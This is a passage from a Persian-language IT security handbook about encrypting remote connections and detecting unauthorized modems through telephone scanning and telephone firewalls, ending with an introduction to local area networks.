‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ ‪ SSL‬ﻭ ‪ SSH‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﻣﺎﻧﻊ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺗﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍﻩ ﺩﻭﺭ ﻛﺸﻴﺪﻩ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ VPN‬ﻣﺎﻧﻨﺪ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞﻛﺸﻲ ﻧﻘﻄﻪ ﺑﻪ‬
‫ﻧﻘﻄﻪ‪ (PPTP) ٢٤٨‬ﻭ ‪ IPSec‬ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻠﻔﻨﻬﺎ ﻭ ﻳﺎ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺍﺷﺘﻨﺪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻭ ﻗﻴﻤﺖ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﻴﺶ ﺍﺯ‬
‫ﻫﺰﺍﺭ ﺩﻻﺭ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﺍﻣﺮﻭﺯﻩ ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ‪ ٣٠٠‬ﺩﻻﺭ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻌﻨﻮﺍﻥ ﻭﺍﺳﻂ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻣﻮﺩﻡ ﻗﺮﺍﺭ‬
‫ﮔﻴﺮﻧﺪ ﻭ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ ﺍﻳﻤﻦ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻭ‬
‫ﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﻳﻚ ﻛﻠﻴﺪ ﺟﺪﺍﮔﺎﻧﻪ ﺑﻔﺮﺳﺘﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﭼﻨﻴﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﺸﻜﻠﻲ‬
‫ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺗﻌﺪﺍﺩ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﻳﻚ ﺳﻄﺢ ﻛﺎﺭﺁ ﺍﺯ‬

‫‪247 Sweep‬‬
‫‪248 Point-to-point tunneling protocol‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨٦‬‬

‫ﺍﻳﻤﻨﻲ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺳﺎﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻮﺩﻣﻬﺎﻳﻲ ﺑﺎ ﻗﻴﻤﺖ ﻣﻨﺎﺳﺐ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ ﻭ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭ ﻧﻴﺎﺯﻣﻨﺪ ﻫﻴﭻ ﻗﻄﻌﺔ ﺧﺎﺹ ﺩﻳﮕﺮﻱ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬

‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺗﺼﺎﻝ ﻣﻮﺩﻣﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﺯ ﻃﺮﻳﻖ ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻧﺼﺐ ﻭ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻮﺩﻣﻬﺎ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﻣﺪﻳﺮ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ ﻣﻤﻨﻮﻉ ﺍﺳﺖ‪ .‬ﺩﺭ‬
‫ﺍﻳﻨﺼﻮﺭﺕ ﻫﺮ ﻣﻮﺩﻡ ﻣﺠﺎﺯ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻣﻤﻴﺰﻱ ﻣﻲﺷﻮﺩ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﻛﻪ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﻭ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ‪ ،‬ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ‪،‬‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺳﺎﻳﺮ ﺗﻨﻈﻴﻤﺎﺕ ﺁﻥ ﻣﻨﻄﺒﻖ ﺑﺮ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺼﺐ ﻣﻮﺩﻡ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ‪ ،‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺧﻮﺩ ﺳﺎﺯﻣﺎﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﻲﺧﺒﺮ ﺍﺳﺖ‪ .‬ﺩﻭ‬
‫ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎﻱ ﺑﻪ ﺍﺻﻄﻼﺡ ﺑﻲﺧﺎﻧﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ‪ ،‬ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻦ‪.‬‬

‫ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ‬
‫ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﻮﺩﻣﻬﺎﻱ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﭘﻮﻳﺸﮕﺮ ﺗﻠﻔﻦ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ‪ .‬ﭘﻮﻳﺸﮕﺮ ﺗﻠﻔﻦ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ‬
‫ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺩﺭ ﻳﻚ ﻣﺤﺪﻭﺩﺓ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺎ ﺗﻤﺎﻡ ﺷﻤﺎﺭﻩﻫﺎ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺎﺳﺦﺩﻫﻨﺪﻩ ﺭﺍ ﺛﺒﺖ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺗﻠﻔﻦ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﺮﺩ ﻛﻪ ﺳﻌﻲ ﻛﻨﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻧﻔﻮﺫ ﻧﻤﺎﻳﻨﺪ‪ .‬ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺗﻠﻔﻦ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﻭ ﺗﺠﺎﺭﻱ‬
‫ﻭ ﺑﺎ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﭘﻮﻳﺶ ﺗﻠﻔﻦ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﻳﻚ ﻋﻤﻠﻴﺎﺕ‬
‫ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪.‬‬

‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻨﻲ‬


‫ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺧﻄﺮ ﻧﻔﻮﺫ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﭼﻨﺎﻥ ﺑﺎﻻ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﻮﻳﺶ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﻮﺩﻣﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺷﺎﻳﺪ‬
‫ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺍﺯ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﺑﺮﺍﻱ ﺍﻓﺰﻭﺩﻥ ﻳﻚ ﻻﻳﺔ ﺑﻴﺸﺘﺮ ﺑﻪ ﺗﻤﺎﺳﻬﺎﻱ ﺗﻠﻔﻨﻲ ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﻭ ﺟﻬﺎﻥ‬
‫ﺧﺎﺭﺝ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﻧﻴﺰ ﻭﺳﻴﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻴﺎﻥ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻦ ﺷﻤﺎ ﻭ ﻣﺪﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻴﺮﻭﻧﻲ ﻗﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﻄﻮﺭ ﻣﻌﻤﻮﻝ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﺩﺍﺭﺍﻱ ﺗﻌﺪﺍﺩﻱ ﭘﻮﺭﺕ ﺑﺮﺍﻱ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪ T1‬ﺍﺳﺖ‪ ،‬ﻭ ﺑﺠﺎﻱ ﻭﺻﻞ ﻛﺮﺩﻥ ﻳﻚ‬
‫‪ PBX‬ﺑﻪ ‪ T1‬ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ‪ PBX ،‬ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﻭﺻﻞ ﻣﻲﺷﻮﺩ ﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻪ ‪T1‬ﻫﺎﻱ ﺧﺎﺭﺟﻲ‪.‬‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻠﻔﻨﻲ‪ ،‬ﻣﺤﺘﻮﺍﻱ ﻫﺮ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﺭﺍ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺭﻭﻱ ﺧﻄﻮﻃﻲ ﻛﻪ ﻗﺮﺍﺭ ﻧﻴﺴﺖ ﺑﻌﻨﻮﺍﻥ‬
‫ﻣﻮﺩﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ ﻣﺘﻮﺟﻪ ﺻﺪﺍﻱ ﻣﻮﺩﻡ ﮔﺮﺩﺩ‪ ،‬ﺗﻤﺎﺱ ﺭﺍ ﭘﺎﻳﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﺭﺧﺪﺍﺩ ﺭﺍ ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﻳﻮﺍﺭﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﺭﺍ ﻫﻤﭽﻨﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻓﻜﺲ‪ ،‬ﺗﻤﺎﺳﻬﺎﻱ ﺗﻠﻔﻨﻲ ﻭﺭﻭﺩﻱ‪ ،‬ﻭ ﻧﻴﺰ ﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﺗﻤﺎﺳﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﻳﺎ ﺧﺪﻣﺎﺕ‬
‫ﺗﻠﻔﻨﻲ ﻛﻪ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺱ ﺭﺍ ﺑﺤﺴﺎﺏ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻣﻲﮔﺬﺍﺭﻧﺪ ﺑﻜﺎﺭ ﺑﺮﺩ‪.‬‬

‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‬


‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻧﻪ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺗﻠﻔﻨﻲ ﻭ ﻧﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﻫﻴﭽﻴﻚ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻴﺶ ﺍﺯ ﻛﺸﻒ ﻭ ﻛﻨﺘﺮﻝ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﻄﻮﻁ‬
‫ﺗﻠﻔﻨﻲ ﻛﻪ ﻣﻲﺷﻨﺎﺳﻴﺪ ﻛﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺁﻥ ﺑﮕﺬﺍﺭﻳﻢ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻣﺤﺪﻭﺩﻩﻫﺎﻱ ﺗﻠﻔﻨﻲ ﺧﺎﺻﻲ ﺩﺍﺭﺩ‪ ،‬ﻗﺎﻋﺪﺗﹰﺎ‬
‫ﺷﻤﺎ ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﺧﻮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﺑﻪ ﻫﻤﻴﻦ ﻣﺤﺪﻭﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭ ﻟﺬﺍ ﭼﻨﺎﻧﭽﻪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺷﺮﻛﺖ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﺟﺪﺍﮔﺎﻧﻪ ﺳﻔﺎﺭﺵ ﺑﺪﻫﺪ ﻭ ﻫﺰﻳﻨﺔ ﺁﻧﺮﺍ ﺍﺯ ﺟﺎﻧﺐ ﺧﻮﺩﺵ ﭘﺮﺩﺍﺧﺖ ﻛﻨﺪ‪ ،‬ﺁﻥ ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ﺩﺭ ﻣﺤﺪﻭﺩﺓ ﺗﻠﻔﻨﻲ ﺳﺎﺯﻣﺎﻥ‬
‫ﺷﻤﺎ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎ ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﻭ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻠﻔﻨﻲ ﻧﻴﺰ ﻗﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﻫﻤﻴﻦ ﻣﻮﺭﺩ‪ ،‬ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻣﺘﺼﻞ ﺑﻪ ﻳﻚ ﻣﻮﺩﻡ ﻧﻴﺰ ﺩﺭ ﻣﺤﺪﻭﺩﺓ ﺍﺯ ﭘﻴﺶ ﺩﺍﻧﺴﺘﺔ ﺷﻤﺎ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﺩ‪.‬‬
‫‪٣٨٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺗﻨﻬﺎ ﺭﻭﺵ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺧﺎﻧﻤﺎﻥ‪ ،‬ﻣﺸﺎﻫﺪﺓ ﺑﺼﺮﻱ ﺟﻌﺒﻪﺗﻘﺴﻴﻤﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺳﻴﻢﻛﺸﻲ ﻭ ﺳﺎﻳﺮ ﻧﻘﺎﻃﻲ ﺍﺳﺖ‬
‫ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﺑﻴﺮﻭﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﺍﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺷﻮﻧﺪ؛ ﻭ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﭘﺮ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺠﺎﺯ ﺍﺳﺖ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﻲﺳﻴﻢ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺯ ﺍﻳﻦ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎ‬
‫ﮔﺮﭼﻪ ﻣﻮﺩﻣﻬﺎﻱ ﺗﻠﻔﻨﻲ ﻫﻨﻮﺯ ﺑﻄﻮﺭ ﻭﺳﻴﻌﻲ ﺑﺮﺍﻱ ﻣﺘﺼﻞ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﻣﻴﻠﻴﻮﻧﻬﺎ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪﻫﺎﻱ ﭘﺮﺳﺮﻋﺖﺗﺮ ﺑﺎ‬
‫ﻻ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻧﻴﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ‪:‬‬
‫ﻳﻜﺪﻳﮕﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻋﻤﻠﻲ‪ ،‬ﺍﻣﺮﻭﺯﻩ ﻣﻌﻤﻮ ﹰ‬

‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ )‪LAN‬ﻫﺎ(‬


‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺩﺭ ﻳﻚ ﻣﻨﻄﻘﺔ ﻭﺍﺣﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ‬
‫ﺷﺒﻜﺔ ‪ Ethernet‬ﺩﺭ ﺍﺑﺘﺪﺍ ﻳﻚ ﺷﺒﻜﺔ ﻋﺎﻡﮔﺴﺘﺮ )ﭘﺨﺶ ﻋﻤﻮﻣﻲ(‪ ٢٤٩‬ﺑﻮﺩ ﻛﻪ ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎ ﻓﺮﻛﺎﻧﺲ ﺑﺎﻻ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ ﺍﻧﺠﺎﻡ‬
‫ﻣﻲﺩﺍﺩ‪ ،‬ﺍﻣﺮﻭﺯﻩ ﺍﺻﻄﻼﺡ ‪ Ethernet‬ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﻳﻚ ﺷﺒﻜﺔ ﺳﻴﻤﻲ ﻫﻤﺮﺍﻩ ﺑﺎ ‪ hub‬ﻳﺎ ﺳﻮﺋﻴﭻ ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ‬
‫ﺑﺎ ﺳﺮﻋﺖ ‪ ١٠٠ ،١٠‬ﻳﺎ ‪ ١٠٠٠‬ﻣﻴﻠﻴﻮﻥ ﺑﻴﺖ ﺑﺮ ﺛﺎﻧﻴﻪ ﻣﻨﺘﻘﻞ ﺳﺎﺯﺩ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﻓﻮﺍﺻﻞ ﻧﺴﺒﺘﹰﺎ ﻛﻮﺗﺎﻩ ‪ -‬ﺩﺭﻭﻥ ﻳﻚ ﺍﺩﺍﺭﻩ ﻳﺎ‬
‫ﺧﺎﻧﻪ ‪ -‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻧﻴﺰ "ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ" ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﺔ‬
‫ﻣﻬﻨﺪﺳﺎﻥ ﺑﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ )‪ (IEEE‬ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ‪.‬‬
